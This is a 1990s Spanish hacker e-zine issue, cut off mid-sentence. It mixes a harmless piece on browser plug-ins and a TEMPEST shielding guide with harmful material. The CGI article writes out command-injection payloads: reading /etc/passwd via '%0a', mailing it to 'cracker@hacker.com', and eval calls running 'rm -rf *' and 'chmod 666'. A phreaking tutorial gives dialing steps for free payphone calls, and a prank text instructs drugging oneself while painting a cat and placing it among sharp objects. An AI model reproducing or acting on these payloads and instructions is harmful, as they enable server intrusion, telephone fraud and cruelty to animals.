Copy Link
Add to Bookmark
Report
RareGaZz Issue 06
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÒÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
<<::RareGaZz::>> º Primer a¤o, numero seis.
"Vive Le RareGaZz" º hacking/phreaking/anarchy/virii/warez/cracking
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ×ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
Revista electronica º
gratuita creada con º Hola a todos esperamos disfruten este numero de la
fines educativos º revista y esperamos sigan enviando sus comments'
exclusivamente.Toda º En este numero nos falto la colaboracion de dos amigos
la informacion de º por todos ustedes conocidos (Mr.X, LePompeItor) en la
esta revista esta º edicion de esta revista pero a pesar de sus examenes
amparada bajo el º finales uno de ellos nos mando un texto para no quedar
concepto de la º mal con todas las personas que lo han apoyado.
libre expresion. º
º Este paquete viene repleto de informacion bastante
Editorial: º util como la informacion sobre los Bugs de Microsoft
º que nos mando duvahazard, notas sobre los virus de
-RareTrip º parte de un aficionado de ellos de nombre Orion y los
-KillerBot º dos textos de otro excelente colaborador Truco.
º
Colaboradores: º Hace poco salio del Underground InterHak Beta con
º acceso gratuito en 3 ciudades de la republica por el
-CrackSmoker º momento y hasta la fecha solo ha sido distribuido a los
-DuvaHazard º chicos favoritos de raregazz. Si aun no tienes una
-Orion º copia de interhak busca el link para bajarlo en alguna
-Truco º parte de esta revista :-)
-Mr. X º
º @@@@@@--> RAREGAZZ@BIGFOOT.COM <--@@@@@@@
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÐÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
ooo oo
$$$o ooo $$$$
$$$o $$$" $$$$
o "$$$ $$$" o$$$ oo 1.- La guerra de los Plug-Ins
$$$oo $$$$ $$$" $$$" o$$$$ 2.- Fallas de seguridad con CGI
oo ""$$$o "" oooooo ""o$$$$" oo 3.- Tempest - La nueva amenaza.
o$$$$$ooo "$"oo$$$$$$$$$$o "$" oo$$$$$ 5.- FR3GANDO A 73LM3X-primer parte-
""$$$$$$o o$$$""" ""$$$$o o$$$$$""" 6.- Anarquia con elegancia
""" o$$$" "$$$o """ 7.- Los Bugientos de Microsoft
o$o$$o$ o$$$ RareGaZz $$$ o$o$o$o 8.- El fenomeno virus
$$$$$$ o$$$ ~~~~~~~~ $$$ "$$$$$$" 7.- Ingenieria Social
ooo $$$$ o$$$" oo 9.- Hackeando BBS's
ooo$$$$$o $$$$o oo$$$" $$$$$$oo 10.- Como cubrir tus huellas 2/2
"$$$$$""" oo "$$$$$$$$$$$""ooo"""$$$$$$ 11.- Que hay de malo con <FONT> ?
""" o$$$$ o """""""" o"$$$oo """ 12.- El padre de todos los virus 2/2
$$$$" o$$$ oo$o $$$ "$$$o 13.- Boomerang!
"" $$$" "$$$ "$$$ "" 14.- NotiLOONS
$$$" "$$o $$$$
$$$" "$"" $$$o "El EZLN no existe" 1/15/1992
""$ $"" "El EPR no existe" 11/6/1996
"El RdK no existe" 6/18/1997
-Gobierno Mexicano
¨ Que nos ense¤a la historia ?
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
"La guerra de los Plug-Ins"ÄÄÄÄÄÄÄÄÄÄÄÄÄ
porÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
KillerBotÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
Has notado un nuevo tipo de espera en linea cuando haces click en algun
link? has tenido que esperar que la grase resbale a travez de tu modem
amontonando el colesterol en el cache de tu disco a punto de un ataque
cardiaco? Tal vez estes sufriendo de sobre-peso en tu navegador.
El sobre-peso de tu navegador se crea cuando en tus viajes por la red bajas
e instalas muchos plug-ins en tu sistema. Mientras mas y mas web-sites
incluyen animaciones y truquitos -como Quicktime VR, Quicktime movies, Real
Audio, Real Video, Shockwave, Chat plugins- existen menos procesamientos
que tu navegador puede hacer por si solo, asi, surfear se vuelve mas
complejo.
Cuando un plug-in en particular es necesario para obtener el impacto
multimedia de un website, tu surfeo se detendra y dos cosas pueden pasar:
1) Si ya bajaste e instalaste el plug-in necesario, tendras que esperar a
que la mentada animacion se copie a tu disco duro, donde es guardada en
el cache de tu navegador y ejecutada.
2) Si aun no tienes el plug-in necesario tendras que conseguirlo (esto a
veces requiere dirigirte a otro website) y despues esperar a que el
plugin se copie a tu maquina.
No es inusual que el tama¤o de estos plugins sea de varios megabytes lo que
puede hacerte gastar tiempo en linea. Y, a pesar de que los applets Java
pueden no a¤adirse a la celulitis de tu PC, ellos tambien pueden tapar las
arterias de tu modem con una sopa espesa de downloads.
Recuerda, una vez que hayas instalado un plug-in en tu sistema, trabajara
para todos los sitios que usen la misma tecnologia plugin. A menos que no
quieras perderte ninguna campana o chiflido de la red mundial (y algunos
son algo elaborados), entonces considera solo cargar los plugins mas
populares.
¨ Por que existen los Plug-Ins ?
Una de las razones por las que el surfeador de hoy se enfrenta con toneladas
de plugins es la poliza abierta de desarrollo del navegador Netscape, que
escencialmente permite que cualquiera desarrolle sus propios suplementos
multimedia para aumentar la experiencia de navegar.
Lo gracioso de todo esto es, que cada uno de los navegadores solos -usando
nada mas que su codigo HTML- pueden crear rapidas, divertidas y firmes
paginas web satisfactorias. De hecho, antes de inyectar otro plugin a la
corriente sanguinea de tu navegador, toma tiempo analizando algunos de los
efectos que puedes disfrutar libre de grasa.
¨ Como poner a dieta a un Browser ?
Si te decides a poner en regimen alimenticio a tu browser, debes separar los
plug-ins lowfat de los waffles. Como hacerlo? Simplemente tienes que hacerte
las siguientes preguntas:
1.- Cuales son mis usos para Internet?
Si buscar informacion (o hackear) es tu principal prioridad, no
necesitaras shockwave o quicktime por ejemplo. Pero estos son los mas
necesarios y populares si tu quieres disfrutar de un buen show en
Internet. Y si te gusta un poco de musica de fondo o escuchar alguna de
las estaciones de radio de internet, entonces debes considerar Real Audio
4.0 que es la mas actual.
2.- Cual es la velocidad de mi modem y cuanto tiempo estoy dispuesto a
esperar para ver una pagina?
Algo menor que 28.8kpbs puede darle un paro cardiaco a tu modem y mandar
tu navegador a un descanso eterno.
3.- Que sitios visito regularmente? Y tienen plug-ins en comun?
Recuerda que una vez el plug-ins este en las venas de tu navegador,
servira para todos los sitios que lo necesiten.
La belleza original de los navegadores es que todos podemos usarlos con
facilidad. Es como un carro modelo deportivo recien comprado, lo aceleramos,
frenamos y manejamos sin tener que meternos con el motor.
Desafortunadamente cada vez mas sitios nos fuerzan a abrir el motor a nuestro
deportivo e insertarle algunos nuevos componentes que pueden afectar su
funcionamiento. Ademas tenemos que actuar como mecanicos especializados para
instalarlos y en otros casos, removerlos.
Algunas definiciones:
Plug-In: Tu puedes expandir la capacidad de tu navegador inyectando varias
herramientas que te permitiran ver (y oir) ciertas cosas, como
archivos de audio o video.
Java: Simplemente es un lenguaje de programacion usado para crear
miniprogramas (conocidos como "applets"), que son automaticamente
bajados cuando te encuentras un sitio "Java enhanced". La compa¤ia
que lo desarrollo es Sun Microsystems, y es usado en muchos juegos
y chats en linea y para animar imagenes.
Puedes bajar un sencillo programa para hacer Applets en la direccion
www.macromedia.com El programa se llama Applet Ace y es gratuito.
Animacion GIF:
La mayoria de las graficas quietas que ves en linea son GIFs. La
ultima version de esas graficas (version 89a) permite crear simples
animaciones cuadro por cuadro. GIF significa "Graphics Interchange
Format".
Real Audio:
Alguna vez has hecho click en algun archivo de audio y esperado
horas para escucharlo? Real Audio por Progressive Networks, es
un formato de audio especial que empieza a tocar el sonido tan solo
segundos despues de que empiezas a hacer el downloading. Una vez
que hayas bajado el plug-in, necesitaras otro momento para correr
al ba¤o ;)
Shockwave:
Mas y mas sitios web dicen estar "shocked". No, no has ofendido a
nadie de alguna manera; quiere decir que ese sitio necesita una
utilidad llamada shockwave creada por Macromedia. Shockwave permite
incorporar animaciones graficas y sonidos en linea.
Espero esto haya sido util de alguna manera y hasta la proxima!
Original para RareGaZz
~~~~~~~~~~~~~~~~~~~~~~
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Fallas de seguridad con CGI
por Gregory Gilliss
Common Gateway Interface (CGI) es una interfaz que permite la comunicacion
entre programas cliente y la informacion de un servidor que comprende el
protocolo de transmision de texto (HTTP). TCP/IP es el protocolo de
comunicacion usado por el script CGI y el servidor durante las
comunicaciones. El puerto default para las comunicaciones es el puerto 80
(privilegiado) pero otros puertos no privilegiados pueden ser especificados.
Los scripts CGI pueden realizar procesos relativamente simples del lado del
cliente. Un script CGI puede servir para dar formato a el lenguaje HTML,
crear documentos HTML dinamicos y generar imagenes graficas dinamicas.
CGI tambien puede realizar entradas y salidas de informacion. CGI guarda
la informacion en variables del sistema que son accesadas por medio del
script. Los scripts CGI tambien pueden aceptar parametros en la linea de
comando. Los scripts CGI operan en dos modos basicos:
- En el primer modo, el script CGI hace un procesamiento de datos basado
en la entrada (input) que se le indica. Un claro ejemplo es el
procesamiento de informacion para corregir la sintax que actualmente
esta usando hotmail.
- El segundo modo es cuando el script CGI actua como conducto de informacion
entre el cliente al servidor y de vuelta al cliente. Como ejemplo, un
script CGI puede ser usado como el frente de una base de datos corriendo
en el servidor.
Los scripts CGI pueden ser escritos usando lenguajes compilados, lenguajes
de programacion interpretados o lenguajes de scripts (scripting). La unica
ventaja que existe entre una u otra forma de crear scripts CGI es la
velocidad de ejecucion.
El set de metodos disponibles para los programas CGI estan definidas en las
especificaciones HTTP 1.0. Los tres metodos pertinentes a esta discusion son
el metodo 'Get', el metodo 'Post', y el metodo 'Put', El metodo 'Get'
consigue informacion del cliente al servidor. El metodo 'Post' pregunta al
servidor si acepta la informacion pasada del cliente como una especificacion
del objetivo. El metodo 'Put' pregunta al servidor si acepta la informacion
como reemplazo del objetivo.
Vulnerabilidades
Las vulnerabilidades causadas por el uso de los scripts CGI no son debilidades
de CGI, son errores en las especificaciones HTTP y en varios programas del
sistema. CGI simplemente permite el acceso a esas debilidades. Hay otras
maneras de explotar la seguridad de un sistema. Por ejemplo, las restricciones
al acceso de archivos pueden ser explotadas usando FTP o telnet. CGI lo unico
que hace es ofrecer mas oportunidades para explotar estas y otras fallas en
la seguridad de un sistema.
CGI permite la lectura de archivos, adquirir acceso shell y corromper archivos
en las maquinas servidoras y sus hosts. Metodos para ganar acceso pueden ser:
explotando los defaults del script, explotando debilidades en el ambiente del
servidor, y explotando debilidades en otros programas y llamadas al sistema.
La principal debilidad de los scripts es insuficiente validacion de las
entradas del usuario.
De acuerdo con las especificaciones de HTTP 1.0, los datos pasados a un
script CGI deben ser codificados para que puedan trabajar en cualquier
hardware o software. Los datos pasados a un script CGI usando el metodo Get
son incluidos al final del Universal Resource Locator (URL). Esta informacion
puede ser obtenida por los scripts CGI como una variable de ambiente llamada
QUERY_STRING. Los datos son pasados como tokens en la forma de variable=valor,
con los tokens separados por &. Las & y otros caracteres alfanumericos deben
ser codificados como valores hexadecimales.
Los caracteres hexadecimales son seguidos por un signo % en la URL. Es la
responsabilidad del script CGI remover caracteres en la entrada del usuario.
Los simbolos como < y >, son delimitadores de HTML tags y son usualmente
removidos con una simple operacion como la siguiente:
Ejemplo de un script con PERL
----------------8<----------------------------------------------------------
# Procesar variables de entrada
{$NAME, $VALUE) = split(/=/, $_); # split up each variable=value pair
$VALUE =~ s/\+/ /g; # Replace '+' with ' '
$VALUE =~ s/%([0-9|A-F]{2})/pack(C,hex,{$1}}/eg; # Replace %xx characters with ASCII
# Escape metacharacters
$VALUE =~ s/([;<>\*\|'&\$!#\(\)\[\]\{\}:"])/\\$1/g;# remove unwanted special characters
$MYDATA[$NAME} = $VALUE; # Assign the value to the associative array
----------------8<----------------------------------------------------------
Este ejemplo remueve los caracteres especiales como el semi-colon que es
interpretado por el shell como un separador de comandos. La inclusion de un
semi-colon en la entrada permite la posibilidad de ejecutar comandos
adicionales en la entrada del usuario.
El ejemplo anterior esta incompleto ya que no remueve la posibilidad de un
caracter de nueva linea '%0a', que puede ser usado para ejecutar otros
comandos que no son parte del script. De esta forma, podemos ejecutar otros
comandos de los que el script nos permite. Por ejemplo, la siguiente URL
pide una copia del archivo /etc/passwd del servidor:
http://www.un-servidor.com.mx/cgi-bin/query?%0a/bin/cat%20/etc/passwd
'%0a' es un enter
'%20' un espacio en blanco
La parte principal de un programa CGI es un documento HTML llamado Form. Los
forms incluyen el tag <INPUT>. Cada <INPUT> tiene una nombre llamado variable
asociado con el. Esta es la variable que forma el lado izquierdo de lo que
previamente se habia mencionado variable=valor. Los contenidos de las
variables del Form forman el valor del token. Los scripts CGI deben realizar
el filtrado de los contenidos del campo <INPUT>. Si los scripts CGI fallan
al filtrar las entradas del usuario, una situacion como el previo ejemplo
podria originarse.
Otra tag HTML que en ocasiones se ve en las forms es <SELECT>. Este tag
permite a un usuario del lado cliente elegir de unas opciones predeterminadas.
La eleccion se vuelve la derecha del token variable=valor pasado al script
CGI. Los scripts CGI seguido fallan al validar la entrada de un campo
<SELECT> asumiendo que el campo contendra datos predeterminados. De nuevo,
estos datos son pasados directamente al programa interpretador de lenguajes.
Programas compilados que no realizen validacion de los caracteres pueden ser
vulnerables.
Un script shell o PERL que invoque el programa de correo de UNIX puede ser
vulnerable a un escape del shell. Mail acepta comandos en la siguiente forma
"~!commando" y forja un shell que ejecute el comando. Si el script CGI no
filtra la sequencia "~!", el sistema es vulnerable. Los agujeros de sendmail
pueden ser explotados de esta manera. De nuevo, la llave consiste en encontrar
scripts que no filtren los caracteres de entrada.
Si puedes encontrar un script CGI que contenga una llamada a UNIX system() con
solo un argumento, entonces has encontrado una puerta al sistema. Cuando la
funcion system() es invocada con un solo argumento, el sistema forja un
shell por separado para manejar la peticion. Cuando esto pasa, es posible
a¤adir datos a la entrada y generar resultados no esperados. Por ejemplo,
un script PERL que contenga lo siguiente:
system("/usr/bin/sendmail -t %s < %s", $mailto_address < $input_file");
esta dise¤ado para enviar por correo una copia de $input_file a la direccion
especificada por la variable $mailto_address. Si copiamos y modificamos la
entrada para el form de la siguiente manera:
<INPUT TYPE="HIDDEN" NAME="mailto_address"
VALUE="direccion@servidor.com;mail cracker@hacker.com </etc/passwd">
podemos explotar al sistema y obtener el passwd del servidor por email.
La funcion system() no es el unico comando que forja un nuevo shell. La
funcion exec() con solo un argumento tambien hace lo mismo. Abrir un archivo
y redireccionar el resultado tambien crea un shell separado. En PERL la
funcion:
open(FILE, "| program_name $ARGS");
abrira FILE y pasara los resultados a program_name que se ejecutara como un
shell separado.
En PERL, el comando eval ejecuta cualquier argumento que sea pasado a el.
Los scripts CGI que pasan la entrada del usuario a el comando eval pueden
ser usados para ejecutar cualquier cosa que el usuario desee. Por ejemplo:
$_ = $VALUE;
s/"/\\"/g # Escape double quotes
$RESULT = eval qq/"$_"/; # evaluate the correctly quoted input
este script pasa los datos de $VALUE a eval escencialmente no modificados,
excepto por asegurarse que las doble " no confundan al interprete. Si
$VALUE contiene "rm -rf *", los resultados serian desastrosos.
Copiar, modificar y reemplazar el archivo de librerias "cgi-lib" permitira
a los usuarios a executar comandos o rutinas dentro del archivo de librerias.
El ejemplo del comando eval permite la ejecucion de:
$_ = "chmod 666 \/etc\/passwd"
$RESULT = eval qq/"$_"/;
este comando permitiria escribir al passwd a todo el mundo.
Conclusion
El uso impropio de los scripts CGI permite a los usuarios un numero ilimitado
de debilidades del sistema. Fallar al validar las entradas de un usuario,
funciones de llamadas al sistema pobremente planeadas e insuficientes
restricciones a los archivos pueden ser explotadas a travez del mal uso de
CGI.
* Adaptado de Mudry, R. J.,
** Adaptado de Phillips, P., Safe CGI Programming,
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
º º
º * TEMPEST * º
º la nueva amenaza º
º ~~~~~~~~~~~~~~~~ º
ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ
TEMPEST es el nombre clave para la tecnologia relacionada con las
emisiones electromagneticas no deseadas del equipo de proceso de datos. La
meta de este texto es reducir la capacidad del oponente de capturar la
informacion que fluye por el equipo de computo. La mayoria de la informacion
que comprende las especificaciones TEMPEST esta clasificada por el gobierno
de los estados unidos americanos y no esta disponible para el uso de los
ciudadanos.
El espectro electromagnetico producido por los componentes de una
computadora para "hablar" entre ellos y sus velocidades (megahertz) producen
un rico set de se¤ales en una ancha parte del espectro electromagnetico.
Debido a que las emisiones ocupan una amplia parte del espectro, existen
formas para bloquear esas emisiones (como cerrar las cortinas para bloquear
la parte visible de la luz) y no son necesariamente efectivas en otras
porciones (rayos uv, etc).
Las emisiones de un sistema de computo pueden ser capturadas y procesadas
para revelar informacion de los sistemas desde simples niveles de actividad
(on/off) hasta capturar las teclas presionadas en un teclado o capturar toda
la informacion del monitor. Se sabe que los sistemas poco protegidos pueden
ser monitoreados efectivamente desde una distancia de 1 kilometro.
Este texto tratara de explicar algunas formas en que puedes reducir las
posibilidades de ser monitoreado usando tecnicas sencillas.
Una forma de ver la tecnologia TEMPEST desde un punto de vista simple es
tratar de comparar el problema de la interferencia de un radio frente a una
se¤al de television y prevenir esa interferencia tratando de evitar la
emision de se¤ales electromagneticas del radio.
Viendo el problema desde esta luz, veras que existen bastantes documentos
para evitar la interferencia de los aparatos electricos. Cada manual de
television o radio contiene informacion para prevenir ese problema que es
virtualmente identico al problema de la tecnologia TEMPEST.
Reducir totalmente las emisiones electromagneticas es casi imposible para
la persona comun. El objetivo debe ser reducir las emisiones por un corto
periodo de tiempo por ejemplo, hasta que la van estacionada frente a tu casa
se retire. Los departamentos contiguos tienen que adoptar tecnicas mas
avanzadas para evitar el espionaje debido a la corta distancia en que pudiera
colocarse una persona con el objetivo de capturar informacion de nuestro
equipo de computo.
_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/
Un buen principio para evitar este tipo de 'espionaje' seria eligir
equipo con las emisiones mas bajas de ondas. Este tipo de equipo esta
catalogado como "clase B".
Todos tus perifericos y equipo deben cumplir con este standard
norteamericano lo que garantiza que solo escaparan una de diez emisiones a
comparacion de la "clase A".
Una vez conseguido este tipo de equipo, hay que seguir las
recomendaciones del fabricante para preservar la integridad del blindaje. Una
de estas recomendaciones es el no operar el equipo de computo con uno o mas
slots de la parte trasera de la computadora abiertos.
_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/
Usa cable protegido para todas las conexiones. Este tipo de cable esta
sobrepuesto a los cables con una lamina de metal o aluminio para mantener las
se¤ales pegadas al cable. Ya no es comun usar cable de tela para conectar a
la computadora, digamos, un floppy drive. El cable sin proteccion trabaja
como una antena para las se¤ales generadas por la computadora y sus
perifericos.
Trata de evitar muchos cables amontonados en la parte trasera de tu
computadora y mantenlos lo mas cortos posible.
_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/
Bloquea la informacion transmitida por tu fax/modem o linea telefonica.
Las lineas telefonicas generalmente estan poco protegidas y la emision de tu
computadora puede usar la linea telefonica como antena asi como tambien puede
hacerlo el tipico monitor de tubos de rayos catodicos "CRT".
Manten tu linea telefonica retirada de las tomas de corriente y
perifericos de tu computadora asi como de la parte trasera del monitor. Esto
es en contra de la costumbre de mantener siempre una linea telefonica cerca
del equipo de computo como se acostumbra recomendar en todos los manuales de
computadoras por razones hasta ahora desconocidas ;)
_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/
Pregunta en tu tienda de electronica por imanes que eviten la emision del
campo electromagnetico, puedes decir que tu computadora interfiere con la
se¤al de television e inmediatamente te conseguiran todo tipo de supresores
de se¤ales.
Recuerda proteger principalmente las lineas telefonicas o el cable de
corriente que no tenga proteccion a parte del plastico que rodea el cobre.
_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/
En caso de interferencia de tu equipo con lineas electricas o con un
componente como el radio o television, puedes construir una caja de Faraday
de aluminio del tipo que hay en casi todas las cocinas. Una buena caja debe
cubrir todos los perifericos incluyendo el cable del teclado, monitor y
modem.
Una caja de este tipo tiene un alto nivel de exito al reducir las emisiones
drasticamente pero recuerda mantener la corriente de aire al equipo.
_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/
Para revisar si tienes un equipo relativamente seguro, lo puedes hacer
con un radio AM portable. Colocalo cerca del cuerpo de la computadora y todos
sus cables. Idealmente, no debes escuchar aumento de estatica en la se¤al. Si
escuchas un aumento de estatica en ciertas partes de la computadora
unicamente (como cables) es necesario bloquear las emisiones de ese lugar con
uno de los metodos descritos.
Para que tengas una idea de las emisiones electromagneticas de tu
computadora una simple brujula es todo lo que necesitas. Si la aguja se mueve
cuando la pones cerca de un componente puedes apreciar que tanta emision de
ondas tu equipo esta soltando.
Hay otras formas de proteger el equipo electrico pero estas son las mas
comunes. Una compa¤ia o sistema que necesite seguridad de primera prioridad
necesita estar protegido para ataques de cualquier tipo. Hoy en dia es mas
facil conseguir aparatos que reciban estas ondas por lo que un intruso puede
obtener passwords, numeros de cuentas y mucha mas informacion con simplemente
estacionarse cerca del objetivo.
[ Adaptacion de "Tempest in a Teapot" de CDC ]
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
*************************************************************************
*************************** FR3GANDO A 73LM3X Parte 1 ************
~~~~~~~~~~~~~~~~~~~~~~~~~~~
Original de Carlos Truco
ooooooooo
oo$$$"""""""$$$$o Pues bien, hoy conoceran algunos de los
o$$"" oooooo ""$$o secretos que encierra nuestra maravillosa
o$$" $$$ $$$$$ "$$o compa¤ia telefonica: TELMEX. Intentare
o$" $$$ $$$$$o "$o dar un peque¤o curso en 10 o 12 numeros
o$" """ "$$$$ "$$ de la revista sobre la infinidad de
o$$ $$$$ $$o posibilidades de hacer phreaking en Mexico.
$$ $$$$ $$
$$ $$$$ $$ Notas:
$$ $$$$ $$ No lo hare por venganza contra las famosas
$$o $$$$ o$$ Southwestern Bell ni France Telecom que
$$ o$$$" $$ deciden sobre nuestros telefonos. Tampoco
$$ o$$ $$$$$ $$ lo hare por el mediocre servicio de Telmex,
$$o $$$ $$$$$" o$$ ni sus constantes interrupciones al ocupar
"$$o $$$ $$$$" o$$" Lada, ni por su extraordinario servicio
""$$ooo"" "" ooo$$"" tercermundista de apenas 10 lineas por
""$$$$$$$$$"" habitante.
Lo hare por ser una de las cien empresas mas importantes del planeta y que
ella se encuentre en manos ajenas, lo hare por aumentar tu conocimento acerca
de como es y como funciona un telefono.
Ya fue definido lo que es un phreaker, la teoria acerca de las boxes, y
algunas otras cosas acerca de este maravilloso arte. Sin embargo hoy no te
explicare como hacer buenos montajes, u otras maravillas con el telefono.
Hoy solo te dire como hacer una llamada local gratis, desde un mugre telefono
publico. Eso es lo que voy a hacer. Hoy ya no quiero decirte mas. Para eso
estara el siguiente numero. Si quieres hacer una llamada local gratis hoy
tendras que buscar una cabina TELMEX con las siguientes caracteristicas:
- El telefono que busques no debera de ser de tarjeta. (No es mi culpa que no
encuentres uno de estos, ya te explicare el truco para los de tarjeta en la
parte 2)
- Tendras que encontrar una cabina gris digital (esas de display peque¤o) para
realizar este truco. Ademas esta tendra que ser especial: Debera estar por
TONOS.
Si no sabes que significa por TONOS, estas frito carnal. Seguro tendras algo
mejor que hacer.
Sinceramente no se cuantas cabinas de este tipo existan en una ciudad de
tama¤o mediano. Considerando el numero de lineas por habitante, y que
TELMEX se renueva por las de tarjeta seran unas cuantas. Sin embargo te
podras quedar por lo menos 25 minutos hablando sin pagar.
En una ciudad como Morelia o Guanajuato ahora que fui de vacaciones encontre
varias en los centros comerciales. Asi que no creo que sea muy dificil
encontrar por lo menos una para tus propositos. Nota: Considerando que no he
probado el truco en toda la Repub. Mexicana, es viable que no sirva en
algunos lugares, debido a que tiene ciertas limitantes, que explico mas
adelante.
En fin ya que la hayas encontrado deberas hacer lo siguiente:
Paso 1 - Marca 9580, y espera. Recibiras un tono de ocupado. Espera unos
segundos a que el tono de ocupado se haga mas rapido. En eso momento continua
con el paso 2.
Paso 2 - Marca ahora un 0. Y espera a que el tono de ocupado se vuelva a
hacer mas rapido.
Paso 3 - Marca otro 0, y tendras el tono de marcar.
Paso 4 - Ahora llama al telefono que desees, no hay cobro por ello.
Limitantes : Este truco no sirve para ciudades con numeros de telefono muy
grandes (por ejemplo el DF, eso creo), o para numeros de larga distancia ya
que se te acaba el display digital. Si quieres hacer el truco en esas
condiciones tendras que hacer lo siguiente:
Graba los tonos producidos por el telefono (los beeps y demas que hace cuando
marcas un determinado numero) en un walkman. Asi si quieres marcar una larga
distancia por ejemplo:
9 1 - ( 8 ) 3 1 - 3 3 7
consigue esos tonos en un cassete, y reproducelos en el auricular del
telefono publico. Claro esta que te puedes conseguir algun programa de
phreaking y facilitarte el trabajo, con una mejor calidad de sonido.
Ese sera tu problema no el mio. En fin si te quieres arriesgar a hacerlo de
esa forma ya es tu bronca. Existen otras formas mas sencillas que no
requieren de esto, para las largas distancias.
Otra limitante: Alguien te puede ver con el walkman y vales carnal... iran
con algun judas y te quitara el walkman y terminaras en barandilla, te lo
advierto. Esto no es el gabacho carnal.
Mas sobre TELMEX en el proximo numero.
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
oooooo
ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ o$$$$$$$$$$o
³ Anarquia con Elegancia ³ $$$$$$$$$$$$$$
³ por ³ $$$$$$$$$$$$$$$o
³ Mr. X ³ "$$$""$$$$""$$$"
ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ $$$ X $$ X $$$
<<::RareGaZz::>> $$oo$$$ooo$$
"$$$$ $$$$"
El editor de raregazz, o cualquiera o"$$$$"o
de sus colaboradores no se hacen "$o o$
responsables de los da¤os mentales, ooo $$$" oo
fisicos o religiosos que puedan resultar $$$o $$$$
de seguir los consejos aqui descritos. $$$$$$$$oo oo$$$$$$$$
Este texto es presentado a ustedes con ""$$$$""
fines educativos unicamente :-) o$$$""$$oo
ooo$$$" $$$$ooo
$$$$$$ $$$$$$
El Gato Funky! """ ""
~~~~~~~~~~~~~~
Materiales necesarios:
======================
- Sustancia halucinogena (preferentemente LSD-25 o derivado)
- Un gato
- Gran cantidad de cera para pisos (industrial o casera)
- Luz blanca tipo rave (camara lenta)
- Bolas peque¤as o juguetes de gato
- Pintura fosforecente (varios colores - que brille mucho)
Instrucciones:
==============
- Colocate en una parte de tu casa grande con piso de vinyl o
madera. (los pisos alfombrados no funcionaran)
- Encera el piso con *bastante* cera y trata de lograr una
superficie muy resbalosa.
- Cubre el area con objetos cortantes (opcional y no aprobado por
la sociedad protectora de animales)
- Remueve todas las fuentes de luz, cubre ventanas, etc.
- Pon la luz en una posicion alta para que ilumine toda el area
encerada.
- Aplica la pintura al gato hasta producir un efecto -en caso de
varios colores- bastante hippie.
- Deja que el gato se seque.
- Toma el LSD mientras esperas que el gato se seque.
Una vez que estes suficientemente bajo las influencias del acido,
prende la luz blanca de camara lenta al nivel de pulso deseado y
